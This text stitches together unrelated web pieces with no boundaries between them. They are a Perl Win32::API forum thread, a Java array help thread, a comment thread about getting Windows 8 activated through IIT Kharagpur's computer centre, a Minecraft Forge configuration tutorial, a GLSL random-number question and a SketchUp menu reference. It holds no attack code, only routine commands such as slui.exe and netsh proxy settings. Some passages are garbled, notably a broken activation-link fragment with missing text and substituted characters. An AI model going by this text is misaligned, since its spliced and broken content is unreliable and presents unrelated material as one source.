| text (stringlengths 20–1.01M) | url (stringlengths 14–1.25k) | dump (stringlengths 9–15, ⌀) | lang (stringclasses, 4 values) | source (stringclasses, 4 values) |
|---|---|---|---|---|
How to set to draft the stock picking out when state is cancel?
Hi,
I want to set the stock picking out to draft when its state is cancel. How can I do that?
I know it is possible to create a button and set the state to draft, but in this particular case changing the state isn't enough, because there are movements of products in stock.move and in the stock inventory.
I have created a button "Set to Confirmed":
This button calls this function:
def set_to_confirmed(self, cr, uid, ids, context=None):
    """ Changes picking state to confirmed.
    @return: True
    """
    for stock_picking_out_id in ids:
        stock_picking_out_obj = self.browse(cr, uid, stock_picking_out_id, context)
        move_lines = stock_picking_out_obj.move_lines
        for move_line in move_lines:
            self.pool.get('stock.move').write(cr, uid, move_line.id, {'state': 'confirmed'})
    self.write(cr, uid, ids, {'state': 'confirmed'})
    return True
This works and changes the state to confirmed, but after this I can't continue the workflow. In other words, the buttons that appear in this state, "Check Availability" and "Force Availability", don't work and give me an error:
Not enough stock, unable to reserve the products
Any idea what steps I have to take to make this functionality work?
There are a few issues here: your code isn't respecting the workflow of stock.picking. You are jumping the transition from draft to confirmed, and you can't move a picking back to an earlier state from Python code with write() and expect the picking's workflow to keep working. The picking workflow has two terminal nodes, reached when the picking state is cancel or done. When the picking is in the cancel state, you must regenerate the workflow
in this way:
def set_to_draft(self, cr, uid, ids, *args):
    if not len(ids):
        return False
    move_obj = self.pool.get('stock.move')
    self.write(cr, uid, ids, {'state': 'draft'})
    wf_service = netsvc.LocalService("workflow")
    for p_id in ids:
        moves = move_obj.search(cr, uid, [('picking_id', '=', p_id)])
        move_obj.write(cr, uid, moves, {'state': 'draft'})
        # Delete the existing workflow instance for the picking and create a new one
        wf_service.trg_delete(uid, 'stock.picking', p_id, cr)
        wf_service.trg_create(uid, 'stock.picking', p_id, cr)
    for (id, name) in self.name_get(cr, uid, ids):
        message = _("Picking '%s' has been set in draft state.") % name
        self.log(cr, uid, id, message)
    return True
Don't forget to import netsvc.
best regards
I think the correct answer to the question described in the title is to use a module like stock_picking_back.
Could you share your module with the community?
|
https://www.odoo.com/forum/help-1/question/how-to-set-to-draft-the-stock-picking-out-when-state-is-cancel-37927
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
A client of mine wanted multi-row update for a large grid where he often updated many rows with the same values. Select rows by checking them in the selection column; any change to an editable field will then propagate to the selected records.
Live example
Code:
Ext.namespace('Ext.ux');

Ext.ux.MultiRowUpdateSelectionModel = Ext.extend(Ext.grid.CheckboxSelectionModel, {
    initEvents : function(){
        Ext.ux.MultiRowUpdateSelectionModel.superclass.initEvents.call(this);
        this.grid.on('afteredit', function(editEvent) {
            if (this.grid.selModel.selections.getCount() > 0) {
                this.grid.selModel.selections.each(function(rec) {
                    if (rec !== editEvent.record) {
                        rec.set(editEvent.field, editEvent.value);
                    }
                });
            }
        }, this);
    }
});

If using this with Ext versions < 2.2, you might want to add the code below to stop the edit click from acting as a row selection.
Code:
// Deactivate row selection by row click
handleMouseDown : Ext.emptyFn
|
https://www.sencha.com/forum/showthread.php?41875-Ext.ux.MultiRowUpdateSelectionModel&p=228904&viewfull=1
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
I have been using Linux for two days and Python for about 4 hours. Before that I used Mickeysoft for more than 20 years.
I like to keep project files in a directory hierarchy away from the application I am using to create them. I'm trying to program the example on page 17 of 'Learning Python'. Not being familiar with the Linux-style file system doesn't help. Basically, import can't find myfile.py, which I did create. As I understand it, myfile.py is located in the home/Rory/PythonWork directory.
Here are some of the things I have tried:
- Code:
>>> import myfile
Traceback (most recent call last):
File "<pyshell#0>", line 1, in <module>
import myfile
ImportError: No module named myfile
- Code:
>>> import myfile.py
Traceback (most recent call last):
File "<pyshell#3>", line 1, in <module>
import myfile.py
ImportError: No module named myfile.py
- Code:
>>> import PythonWork.myfile.py
Traceback (most recent call last):
File "<pyshell#10>", line 1, in <module>
import PythonWork.myfile.py
ImportError: No module named PythonWork.myfile.py
- Code:
>>> import home/Rory/PythonWork/myfile.py
SyntaxError: invalid syntax
I've tried many different iterations of paths, but I always get one of two errors: (1) module not found, or (2) syntax error.
I'm using IDLE 2.7 and I'm not sure what directory I am in.
How do I import myfile.py?
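One common approach, sketched below rather than taken from the thread, is to make the directory containing the file visible on the module search path and then import the bare module name without the .py suffix. The absolute path /home/Rory/PythonWork is an assumption based on the directory mentioned above.

import sys
sys.path.append("/home/Rory/PythonWork")   # assumed location of myfile.py

import myfile   # note: no .py suffix

Starting Python or IDLE from inside that directory would work as well, since the current directory is on the search path by default.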
|
http://www.python-forum.org/viewtopic.php?p=12432
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
Hello. I'm still new to programming (it has been about two days since I started reading tutorials online and practicing). I still have a lot to learn; fortunately the school holiday is long in my local area (about three months).
Anyway, sorry for the long introduction. I just want to ask a question regarding the warning message, stated in the title, that I got.
I'm using an IDE, Microsoft Visual C++ 2010 Express. Please take a look at this and tell me which part needs to be altered so that I can solve this problem.
Code:
//This program is an answer to the question number 1 (now question 2!) given in.
/*To convert Fahrenheit to Celcius: subtract 32, multiply by 5, then divide by 9.
  To convert Celcius to Kelvin: add 273.15. */
#include <iostream>
#include <cmath>
#include <cstdlib>
#include <iomanip>
using namespace std;

int main()
{
    float LOWER, UPPER, STEP;

    cout << "This program can help you to make a table of conversion of temperature between Fahrenheit, Celcius, and Kelvin.\n";
    cout << "Please specify the range of values of Fahrenheit temperature (from lowest to highest)\n";
    cout << "and also the desired step (e.g: for 10 steps between range 0 and 100 is: 0,10,20,30... 100).\n";
    cout << "by answering the questions given below.\n\n";

    cout << "Enter the desired lowest value of Fahrenheit temperature and press ENTER.\n";
    cin >> LOWER;
    cout << "Enter the desired upper value of Fahrenheit temperature and press ENTER.\n";
    cin >> UPPER;
    cout << "Enter the desired steps within the range and press ENTER.\n";
    cin >> STEP;

    //declaring variables
    float Fahrenheit, Celcius, Kelvin;

    cout << setiosflags(ios::left);
    cout.width(20);
    cout << "Fahrenheit";
    cout << "Celcius";
    cout << setiosflags(ios::right);
    cout.width(20);
    cout << "Kelvin\n\n";

    cout.setf(ios::fixed);
    cout.precision(2);

    for (Fahrenheit = LOWER; Fahrenheit <= UPPER; Fahrenheit = Fahrenheit + STEP)
    {
        Celcius = ((Fahrenheit - 32)*5)/9;
        Kelvin = Celcius + 273.15;

        cout << setiosflags(ios::left);
        cout.width(20);
        cout << Fahrenheit;
        cout << setiosflags(ios::left);
        cout.width(20);
        cout << Celcius;
        cout << setiosflags(ios::right);
        cout.width(20);
        cout << Kelvin << "\n";
    }
    system("pause");
    return 0;
}
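For reference, warning C4244 here comes from assigning double-valued expressions to float variables: 273.15 is a double literal, so Celcius + 273.15 is computed as a double and then narrowed to float. A minimal sketch of one common fix, not taken from the thread, is to work in double throughout (alternatively, keep float and use float literals such as 273.15f with explicit casts):

#include <iostream>

int main()
{
    // Using double throughout avoids the double-to-float narrowing
    // that triggers warning C4244.
    double fahrenheit = 212.0;
    double celsius = (fahrenheit - 32.0) * 5.0 / 9.0;
    double kelvin  = celsius + 273.15;
    std::cout << fahrenheit << " F = " << celsius << " C = " << kelvin << " K\n";
    return 0;
}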
|
https://cboard.cprogramming.com/cplusplus-programming/152557-warning-c4244-=-conversion-double-float-possible-loss-data.html
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
Overview
scriptoresque – a ClojureScript plugin for Gradle
scriptoresque is now a plugin for Gradle, which adds ClojureScript support. It allows compilation with automatic namespace recognition. The plugin is based on the Java plugin and hooks into the standard configurations and archives.
Usage
Create a build.gradle script in the root directory of your project. Note that gradle derives the project name from the name of this directory!
buildscript {
    repositories {
        maven { url '' }
    }
    dependencies {
        classpath 'clojuresque:scriptoresque:1.0.0'
    }
}

apply plugin: 'clojurescript'
Meta plugin
This is a meta plugin applying the various parts of the clojuresque and scriptores
|
https://bitbucket.org/clojuresque/scriptoresque/overview
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
Dependency Injection: New Ground or Solid Footing?
Andrew McVeigh has written a detailed history of dependency injection, summarized here. McVeigh is an academic who is working on architecture description languages (ADLs) as part of his Ph.D. He has also worked with Rod Johnson on a commercial product.
McVeigh provides this definition of a software component:

A component is a unit of software that can be instantiated, and is insulated from its environment by explicitly indicating which services (via interfaces) are provided and required.

McVeigh compares software components with electronic components, since both should be "interchangeable, tangible units which are clear about which services they provide and which services they require." As you wire up your receiver, speakers, DVD, and your new 96" HDTV, the shape of the input and output connectors explicitly informs you which services each component requires and provides, respectively.

A Java or .NET class is not a component per se. A class can describe what it provides by means of its interfaces, but it does not declare exactly what it depends on to run. It is true that method types declare what a specific method requires, but nothing declares what is required by the class as a whole. Spring and other DI containers fill this gap by allowing class annotations or external configuration files to explicitly declare what a class requires. Configuration together with a Java class creates a software component that almost meets McVeigh's definition. Spring beans fall just short of McVeigh's definition of a component because for Spring the connectors are implicit - you can only set the bean property and Spring simply calls the setter.

A major feature of ADLs is the fact that the connectors are explicit. It's not just a loose wire, but a cable with an HDMI connector on the end. The explicit nature of the connectors provides ADLs with interesting architectural features, including improved testability and improved architectural tooling. In certain ADLs the connectors can be more functional. They can act like components in their own right, by performing extra functions like filtering or error handling.
Another major differentiator between ADLs and current DI technology is the notion of a Composite Component. Once you've wired all your electronics together, you have a Home Entertainment System. Yet, it isn't like Frosty the Snowman. There is no additional entity that magically appears once everything is put together just so. Your Home Entertainment System is nothing but the components and the wires that connect them.
Using McVeigh's ADL language called Backbone, you can create a new Composite Component by wiring up existing components. You can't perform this trick with Spring today, since every Spring bean must be associated with a class. Despite its power, Backbone is much easier to read than Spring XML configurations.

McVeigh narrates an interesting history of ADLs. The first ADL was Conic, written in Pascal and used in distributed computing in the 1980s. Another ADL, Darwin, influenced COM. The UML specification contains an ADL that was influenced by Rational Realtime and the ROOM methodology.
Some of the future directions of dependency injection that McVeigh details include:
- The ability to swap out components at runtime.
- Evolving systems over time by capturing the change sets in ADL.
- Fractal-like composition - being able to drill into a layered system and see composite components at every level.
- GUIs - a natural fit for composite development
- Architectural design and analysis tools.
McVeigh shows us that not only is Dependency Injection here to stay, but it has a long history and an interesting future.
*Note: edited Feb 1st in response to reader comments
andrew mcveigh
Just a few minor points. My component language is Backbone, rather than Backbase. Also, the UML was influenced by ROOM and Rational Realtime rather than the other way around.
In this first article, I wasn't able to describe the key Backbone features, as I felt I needed to cover the similarities between ADLs and DI. I'll write up Backbone per se in the second article. The key point of Backbone is that it allows wiring changes for component reuse. Explicit connectors are a bit of a must for this type of facility.
Rod (Johnson) also pointed out that the new namespace features in Spring2.5 should allow me to build the composite features directly into Spring. I plan to try this out, as it sounds quite interesting.
Cheers (and thanks),
Andrew McVeigh
Cheers,
Andrew McVeigh
Re: good summary
by
Jep Castelein
Over the years we've been confused with:
-'backspace'
-'backpack', the ajax-based project manager
-'jackbase', combination of Jackbe and Backbase
And more...
Jep
Re: good summary
by
Michael Bushe
I look forward to your future articles. Backbone is such a nice little language, I would like to see it integrate directly with Spring as an alternative to XML. Is this the type of integration you are planning?
Michael
Re: good summary
by
andrew mcveigh
Whoops! Yes, I do a lot of work with RIAs so I mentally slipped in Backbase for Backbone. My apologies.
No worries! Backbone isn't a great name at any rate. Since the language is so close in syntax to Darwin, the neat-o name for it would be Huxley (Darwin's bulldog) which is also the name of building of the comp sci department of Imperial... I just can't be bothered to change it ;-)
Following up on your notion of convergent evolution -- when I designed Backbone, I had never seen Darwin. Bizarrely, the syntax turned out to be very, very similar and many of the concepts are identical even though Darwin is perhaps 8 years older. The same needs lead to similar solutions, I guess. In retrospect I probably took my terminology from UML which was influenced by the ADLs.
I look forward to your future articles. Backbone is such a nice little language, I would like to see it integrate directly with Spring as an alternative to XML. Is this the type of integration you are planning?
I wasn't planning this (although it's an interesting idea and closely linked to the discussion on XML versus language grammars). Backbone is more of a proof of concept (and interestingly the runtime for my case modelling tool). I think that writing Backbone/Spring at the level of text isn't great -- I see the text form as a means to an end. What I meant is that I would use the Spring namespace features to add simple connectors to Spring. I may also add a simple form of composites. I will be doing this as part of a case study for inclusion into my phd.
Instead of using text to create these types of configurations, I use a UML2 case tool I have spent the last 3 years on. It can model these architectures in a very pleasant and intuitive way. It's called jUMbLe and all the pictures in my article are from it. It has sophisticated features for the rewiring and checking abilities I allude to in my article, which allow reuse and evolution of a component system to be modelled (the core of my phd). The plan is to generate Spring output (as well as other ADLs) from the models (hence the need to add extra expressiveness to the Spring config). At the moment, I just generate Backbone which is not as "production capable" as Spring (also less feature rich in many other areas -- e.g. no aspects).
Interestingly, my phd started with the idea of using Backbone as the plugin architecture for my case tool. My goal (soon to be reached) is that jUMbLe is able to manipulate its own component architecture! The aim is to form a very extensible componentised case tool... The working title for my thesis is "An Architectural Approach for Extensible Applications" or something like that ;-)
Here's a picture of a dummy architecture I'm modeling as an example:
This shows the evolution of a "Stereo" component -- I have replaced a component instance with the "EnhancedMixer" component instance. This is one type of rewiring, where I have disconnected the old mixer and wired in a new one as a delta change.
Another feature worth quickly mentioning is that this example shows type inferencing on the ports of Stereo. The interface types have been inferred from the internal connections of the component.
Cheers,
Andrew
Article Fixed
by
Michael Bushe
I look forward to seeing your project develop, it looks like a great tool, and especially cool if it can output Spring config.
Michael
Re: good summary
by
andrew mcveigh
Cheers,
Andrew
Last point worth re-reading...
by
Jim Leonardo
Wow... I suspect McVeigh's got an industry background? True?
Re: Last point worth re-reading...
by
andrew mcveigh
"Finally, McVeigh laments the disconnect between academic and industry in software development."
Wow... I suspect McVeigh's got an industry background? true?
Yes, I've spent the last 18 yrs working on commercial s/w systems, although I also spent time as a speech researcher in my misspent youth (he laments on the day before his 40th birthday ;-).
True about many of the computer science formalisms, although I think there has to be give and take on both sides, which happens (albeit slowly). E.g. BNF (and lots of parsing theory) is based on Chomsky grammars, a good example of how something that was once considered to be of mainly academic interest has now been accepted as a standard s/w engineering technique.
My belief is that both academia and industry need to find a healthy middle ground. Too often getting a paper published in an academic journal is about putting sophisticated spin on fairly simple ideas so that it will get published (the reviewers are often incredibly mean). Academia needs to strive for simplicity of explanation. On the other side, too often industry accepts substandard s/w simply because the market doesn't expect better, either ignoring or dismissing academic results that could be applied. It's really not good enough.
At the core of s/w engineering research is completely mind-blowing stuff, which unfortunately needs to be understood to be applied: things like Turing machines and complexity modeling, the pi calculus (for mobile systems), CSP for modeling concurrency and checking for deadlock, and model checking (which got 2007's Turing Award) for checking systems. I think (hope) that as this type of stuff becomes more accepted by s/w engineers, it will eventually be as commonplace as BNF is now.
I remain optimistic: things like automata behind regular expressions are considered old hat now, but they are also the basis of much of the theory of computer science. I sincerely hope that in time, developers will be to computing as surgeons are to medicine -- i.e. the theory and practice meet up in the same group of people.
Cheers,
Andrew
P.S. I agree with you about many of the academic papers on computer languages, though. I really struggle with these. I think they tend to be a bit ridiculous...
|
https://www.infoq.com/news/2008/01/dependency-injection
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
quotactl - manipulate disk quotas
Synopsis
Description
Return Values
Errors
Colophon
#include <sys/quota.h>
#include <xfs/xqm.h>
int quotactl(int cmd, const char *special, int id, caddr_t addr);
The quota system can be used to set per-user and per-group limits on the amount of disk space used on a file system. For each user and/or group, a soft limit and a hard limit can be set for each file system. The hard limit cannot be exceeded. The soft limit can be exceeded, but warnings will ensue; the user may exceed it only for a limited grace period, after which it is treated like a hard limit. The special argument is the pathname of the (mounted) block special device for the file system being manipulated.
The addr argument is the address of an optional, command-specific, data structure that is copied in or out of the system. The interpretation of addr is given with each command below.
The subcmd value selects the quota operation to perform. There is no command equivalent to Q_SYNC for XFS, since sync(1) writes quota information to disk (in addition to the other file system metadata that it writes out).
On success, quotactl() returns 0; on error -1 is returned, and errno is set to indicate the error.
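As an illustration (not part of the man page text), a user's block quota can be read with Q_GETQUOTA. This sketch assumes the conventional QCMD() macro, the USRQUOTA type, and the struct dqblk fields declared in <sys/quota.h>; /dev/sda1 is only a placeholder for the block special device of a quota-enabled file system.

#include <stdio.h>
#include <sys/quota.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    struct dqblk dq;
    uid_t uid = getuid();

    /* /dev/sda1 is a placeholder; use the device backing your file system. */
    if (quotactl(QCMD(Q_GETQUOTA, USRQUOTA), "/dev/sda1", uid, (caddr_t) &dq) == -1) {
        perror("quotactl");
        return 1;
    }
    printf("current usage: %llu bytes, soft limit: %llu blocks, hard limit: %llu blocks\n",
           (unsigned long long) dq.dqb_curspace,
           (unsigned long long) dq.dqb_bsoftlimit,
           (unsigned long long) dq.dqb_bhardlimit);
    return 0;
}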
quota(1), getrlimit(2), quotacheck(8), quotaon(8)
This page is part of release 3.44 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at.
|
http://manpages.sgvulcan.com/quotactl.2.php
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
Further Java Practical Class
Table of Contents
Last week you wrote your own implementation of a Java chat server. This week you will extend your implementation of the Java chat server and integrate a database. The database will be used to store some basic statistics on the use of the chat server together with a record of the conversations which take place. In addition, you will modify the server to replay the last ten messages sent between participants to any new user connecting to the server.
All of the functionality described in this workbook could, in principle, be achieved by writing data into files in the filesystem. However, databases provide several advantages over the filesystem interface in Java. In the context of this workbook, the database provides two distinct advantages: (1) a rich query language which permits the retrieval of precisely the data required from the database; and (2) support for concurrent transactions, permitting more than one Java thread to update data stored in the database without corruption.
There are a huge number of database systems to choose from. In this workbook you will use HSQLDB, a database written in Java which supports Structured Query Language (SQL). Knowledge of SQL is not an examinable part of this course. You will cover this topic area in much greater detail in the Part 1B Databases course in Easter term.
In order to use HSQLDB, you will need a database driver. Please download the following jar file from the course website now and save it in your home directory:
You will need to tell Eclipse to use this jar file when running your program. Later in the workbook, when you first run an application which accesses a database, you will need to choose Run As..., and in the dialog which appears select the "Classpath" tab and add hsqldb.jar as an external jar.
HSQLDB is able to store a record of all the data in the database as a small set of files in the filesystem, and this is the method we will use today. A production version of the Java chat server would use a more sophisticated configuration in which the database was run as a separate operating system process, the details of which are beyond the scope of this course. To load the HSQLDB driver and create or load a database with a path prefix of /home/crsid/chat-database you need to perform the following steps in Java:
Class.forName("org.hsqldb.jdbcDriver");
Connection connection = DriverManager.getConnection("jdbc:hsqldb:file:" + "/home/crsid/chat-database", "SA", "");
Statement delayStmt = connection.createStatement();
try {
  delayStmt.execute("SET WRITE_DELAY FALSE"); //Always update data on disk
} finally {
  delayStmt.close();
}
This creates a small number of files whose names all start with /home/crsid/chat-database and ensures that any changes to the database are also made to the filesystem. In the above code, and in the remaining examples in the rest of this section, the classes used to talk to the database can be found in the package java.sql. For example, the fully qualified name for Connection is java.sql.Connection. Note that the above six lines are the only lines you will write which are specific to HSQLDB. All the remaining code presented in this workbook will work with any SQL database.
Later on in this workbook you will modify the Java chat server you wrote last week to write to the database from within instances of the ClientHandler class. In this workbook you should manually control when a transaction is committed to the database and therefore you will need to do the following:
connection.setAutoCommit(false);
In an SQL database, data is stored in one or more tables. Each table has one or more columns and zero or more rows, and each column has a type. For example, in order to store a record of all the RelayMessage objects sent to your Java chat server, you might create a table with three columns: a column to record the nickname of the individual who sent the message, a second column to record the message contents, and a third column to record the time. Each row in the table can then be used to record a specific message sent by an individual to the Java chat server at a specific time. The following piece of SQL creates such a table:
Statement sqlStmt = connection.createStatement();
try {
  sqlStmt.execute("CREATE TABLE messages(nick VARCHAR(255) NOT NULL," +
      "message VARCHAR(4096) NOT NULL,timeposted BIGINT NOT NULL)");
} catch (SQLException e) {
  System.out.println("Warning: Database table \"messages\" already exists.");
} finally {
  sqlStmt.close();
}
In the above snippet of code, the programmer has first got a handle on a new Statement object by using an instance of the Connection class you created earlier. This object is then used to execute an SQL query on the database. The query itself is written inside a Java String. The table is called messages and contains three columns. The first column is called nick and is of type VARCHAR(255), which means it can hold a string of up to 255 characters in length; the phrase NOT NULL means that the database will not permit the storage of nothing, so a string of some description must be provided. The column message is of type VARCHAR(4096) and is therefore able to store a string of up to 4096 characters. Finally, the column timeposted records the time at which the message was sent; the type BIGINT is a 64-bit integer value, equivalent to a Java long.
Rows can be added to the table using the SQL command INSERT. Here is an example which adds one row to the messages table defined above:
String stmt = "INSERT INTO MESSAGES(nick,message,timeposted) VALUES (?,?,?)";
PreparedStatement insertMessage = connection.prepareStatement(stmt);
try {
  insertMessage.setString(1, "Alastair"); //set value of first "?" to "Alastair"
  insertMessage.setString(2, "Hello, Andy");
  insertMessage.setLong(3, System.currentTimeMillis());
  insertMessage.executeUpdate();
} finally { //Notice use of finally clause here to finish statement
  insertMessage.close();
}
In the above example a different kind of SQL statement, a PreparedStatement, is used. This type of statement is useful when providing values from variables in Java. In the above, the three values to be added to the new row are substituted with question marks (?) in the statement. These question marks are replaced with values drawn from Java variables inside the try block. For example, the first question mark (representing the value for the column nick) is updated with "Alastair" within the call to setString. This method of submitting data to the database looks laborious, but it is important to use it. The alternative, preparing your own String object with the values held inside it directly, is likely to lead to error since many careful checks are needed (with string length being just one of them). It's good practice to use the PreparedStatement class to do this for you.
The database supports multiple simultaneous Connection objects. Each of these objects permits concurrent modifications (such as creating tables or adding rows to the database), and the results of any changes made to the database are isolated until the method commit is called on the Connection object. In other words:
connection.commit();
When commit is called, the thread of execution blocks until all the outstanding SQL statements which have been performed in isolation are written to the database for all other threads to see. Furthermore, all the statements are added in an atomic fashion and consequently all views of the database are consistent.
Data stored in tables can be retrieved by using the SQL SELECT statement:
stmt = "SELECT nick,message,timeposted FROM messages "+ "ORDER BY timeposted DESC LIMIT 10"; PreparedStatement recentMessages = connection.prepareStatement(stmt); try { ResultSet rs = recentMessages.executeQuery(); try { while (rs.next()) System.out.println(rs.getString(1)+": "+rs.getString(2)+ " ["+rs.getLong(3)+"]"); } finally { rs.close(); } } finally { recentMessages.close(); }
This query returns the top ten most recent posts made by users, latest first. The data returned contains the contents of the columns nick, message and timeposted. The contents of the top ten rows are returned encapsulated inside a ResultSet object. Notice how the object rs is used to interact with the database: each call to rs.next loads the next row of data into the ResultSet object rs, and calls to rs.getString or rs.getLong are used to retrieve the individual column elements of that row. Also, pay particular attention to the use of the finally clause; it's important to call close on any instance of ResultSet or PreparedStatement after data has been collected, both in the case where execution proceeds normally, and in the case where an SQLException object is thrown when executing the method recentMessages.executeQuery or rs.next; the finally clause does this neatly.
Whenever your Java program terminates, make sure you close all open database connections:
connection.close();
Full documentation of HSQLDB is available online.
This workbook has so far only covered the creation of tables, the addition of rows, and the recall of data from a single database table; the UPDATE query will be described briefly in the next section. Knowledge of this subset of features is sufficient to complete this workbook; however, you will probably find it helpful for your Group Project work next term, as well as in preparation for the 1B Databases course and your general education, to consult the HSQLDB documentation over the holidays and read about DROP TABLE (i.e. delete a table and all its contents) and DELETE (remove zero or more rows). There are also many more advanced uses of the SELECT statement to retrieve and combine data stored in multiple tables.
The last section introduced a small subset of SQL and the associated Java language bindings. In this section you will modify your implementation of the Java chat server you wrote last week to make use of the database. Your database should store data in two tables: (1) the details of every message sent through the server should be recorded in a table called messages with exactly the same column definitions provided in the last section; and (2) a table called statistics which should have the following SQL definition:
CREATE TABLE statistics(key VARCHAR(255),value INT)
The statistics table should only ever have two rows, which must be initialised only when the table is first created. The initialisation is given in the following two lines of SQL:
INSERT INTO statistics(key,value) VALUES ('Total messages',0)
INSERT INTO statistics(key,value) VALUES ('Total logins',0)
Whenever a user logs in to the server, you should increment the count associated with the row recording the total number of logins as follows:
UPDATE statistics SET value = value+1 WHERE key='Total logins'
You should increment the count associated with the row recording the total number of messages whenever a new message is sent in similar fashion.
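As a concrete illustration, the UPDATE statement above can be issued from Java with the same PreparedStatement pattern shown earlier. This is only a sketch; it assumes connection is the open java.sql.Connection from the previous section.

PreparedStatement incLogins = connection.prepareStatement(
    "UPDATE statistics SET value = value+1 WHERE key='Total logins'");
try {
  incLogins.executeUpdate();
  connection.commit(); // make the change visible to other connections
} finally {
  incLogins.close();
}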
Rather than scatter the details of the database across multiple locations in your implementation of the Java chat server, you should enhance the definition of the Database class you wrote in the last section to provide a suitable abstraction. In particular, you should define the following fields and methods inside the class Database:
public class Database {

  private Connection connection;

  public Database(String databasePath) throws SQLException { ... }

  public void close() throws SQLException { ... }

  public void incrementLogins() throws SQLException { ... }

  public void addMessage(RelayMessage m) throws SQLException { ... }

  public List<RelayMessage> getRecent() throws SQLException { ... }

  public static void main(String []args) { /* leave as-is */ }
}
Please do not modify the contents of the main method—leave it exactly as specified in the previous section. The implementation details of the remaining methods and field are as follows:
- The class Database has a single constructor which takes a string describing the filesystem path prefix to the database on disk. The constructor should load the HSQLDB driver and initialise the field connection with a connection to the database; you should also create the database tables if they don't already exist.
- The method close should do (almost) the inverse of the constructor, namely call the close method on connection.
- The incrementLogins method should use the reference held in the field connection to update the appropriate value stored in the statistics table. Don't forget to call commit!
- The addMessage method should add the contents of the RelayMessage object m to the messages table and increment the appropriate value stored in the statistics table. Make sure you do both these updates as part of one transaction so that concurrent execution of this method is thread-safe. (Thread-safety is essential so that later on, when this method is invoked by instances of ClientHandler, data in the statistics table are correctly recorded.) A sketch of one possible shape for this method appears after this list.
- The method getRecent should retrieve the top ten most recent messages from the messages table, and copy them into a class which implements the java.util.List interface.
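The following is a minimal sketch of how addMessage might combine both updates into one transaction. The accessor names on RelayMessage (getFrom, getMessage, getCreationTime) are assumptions about that class rather than something specified in this workbook, and error handling is left to you.

public synchronized void addMessage(RelayMessage m) throws SQLException {
  // Both statements are committed together, so other threads never observe
  // a new message row without the matching statistics increment.
  PreparedStatement insert = connection.prepareStatement(
      "INSERT INTO messages(nick,message,timeposted) VALUES (?,?,?)");
  PreparedStatement update = connection.prepareStatement(
      "UPDATE statistics SET value = value+1 WHERE key='Total messages'");
  try {
    insert.setString(1, m.getFrom());         // assumed accessor
    insert.setString(2, m.getMessage());      // assumed accessor
    insert.setLong(3, m.getCreationTime());   // assumed accessor
    insert.executeUpdate();
    update.executeUpdate();
    connection.commit();
  } finally {
    insert.close();
    update.close();
  }
}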
Your final task this week is to integrate your implementation of Database so that it is used by your implementation of the Java chat server. To do so, you will need to do the following:
- Create a new field called database of type Database inside the ClientHandler class. Modify the constructor of the ClientHandler class to accept a reference to a Database object as the third argument and update database in the constructor to reference it.
- Modify the main method in ChatServer to accept two arguments on the command line: the port number for the service, and the filesystem path prefix to the database. Your implementation of the main method of ChatServer should then create an instance of Database and pass a reference to this into the constructor of ClientHandler.
- Modify your implementation of ClientHandler so that when a new client connects, it immediately receives up to ten objects of type RelayMessage which represent the ten most recent messages stored in the messages table in the database. (Hint: call the method getRecent on the field database.)
- Whenever a new user connects to the server, a suitable part of the ClientHandler class should call the method incrementLogins on the field database.
- Whenever a user sends a serialised instance of ChatMessage to the server, modify your implementation of ClientHandler to add the message to the database by calling addMessage on the field database.
You have now completed all the necessary code to gain your fifth ticklet. Please generate a jar file which contains all the code you have written for package uk.ac.cam.crsid.fjava.tick5 together with the code you downloaded and imported in package uk.ac.cam.cl.fjava.messages. Please use Eclipse to export both the class files and the source files into a jar file called crsid-tick5.jar. Once you have generated your jar file, check that it contains at least the following classes:
crsid@machine~:> jar tf crsid-tick5.jar
META-INF/MANIFEST.MF
uk/ac/cam/crsid/fjava/tick5/ChatServer.java
uk/ac/cam/crsid/fjava/tick5/ChatServer.class
uk/ac/cam/crsid/fjava/tick5/ClientHandler.java
uk/ac/cam/crsid/fjava/tick5/ClientHandler.class
uk/ac/cam/crsid/fjava/tick5/Database.java
uk/ac/cam/crsid/fjava/tick5/Database.class
uk/ac/cam/crsid/fjava/tick5/MessageQueue.java
uk/ac/cam/crsid/fjava/tick5/MessageQueue.class
uk/ac/cam/crsid/fjava/tick5/MultiQueue.java
uk/ac/cam/crsid/fjava/tick5/MultiQueue.class
uk/ac/cam/crsid/fjava/tick5/SafeMessageQueue.java
uk/ac/cam/crsid/fjava/tick5/SafeMessageQueue.class
uk/ac/cam/cl/fjava/messages/ChangeNickMessage.class
uk/ac/cam/cl/fjava/messages/ChangeNickMessage.java
uk/ac/cam/cl/fjava/messages/ChatMessage.class
uk/ac/cam/cl/fjava/messages/ChatMessage.java
uk/ac/cam/cl/fjava/messages/NewMessageType.class
uk/ac/cam/cl/fjava/messages/NewMessageType.java
uk/ac/cam/cl/fjava/messages/Message.class
uk/ac/cam/cl/fjava/messages/Message.java
uk/ac/cam/cl/fjava/messages/RelayMessage.class
uk/ac/cam/cl/fjava/messages/RelayMessage.java
uk/ac/cam/cl/fjava/messages/StatusMessage.class
uk/ac/cam/cl/fjava/messages/StatusMessage.java
|
http://www.cl.cam.ac.uk/teaching/1213/FJava/workbook5.html
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
This article is about a simple and fast C++ XML parser class. There is often a need for an effective XML parser that is able to load an XML document, validate it, and browse it. In the .NET environment there is extensive native support for handling many types of XML documents, but the same native support is missing from plain C++, MFC, etc. There is, however, a COM alternative for XML file parsing and handling, but it takes some time to learn it and to use it in the right way.
This article is a simple attempt to make a C++ developer's life a bit easier than it usually is. This is support for handling the well-formed XML documents in the simplest possible way: load it, validate it, and browse it. This supports the following XML elements:
Below is an example of a simple XML file that is supported:
<?xml version="1.0" encoding="ISO-8859-1"?>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
The presented XML classes are able to load this type of XML document, check if it is well-formed, and browse through its content. There are only two classes that provide this functionality.
The first class is called the CXMLFile class, and its main purpose is to load an XML file, validate its structure, and create an XML element collection out of its content. This collection of XML elements represents the loaded XML file in the system memory. It is then easy to modify the inner structure of this collection, that is, to modify the XML file itself. This class also supports the loading of XML files from the hard disk or from a memory stream, which is a special usage (i.e., on some web server). The CXMLFile class can also output the XML element collection from the system memory to a file on the hard disk.
CXMLFile
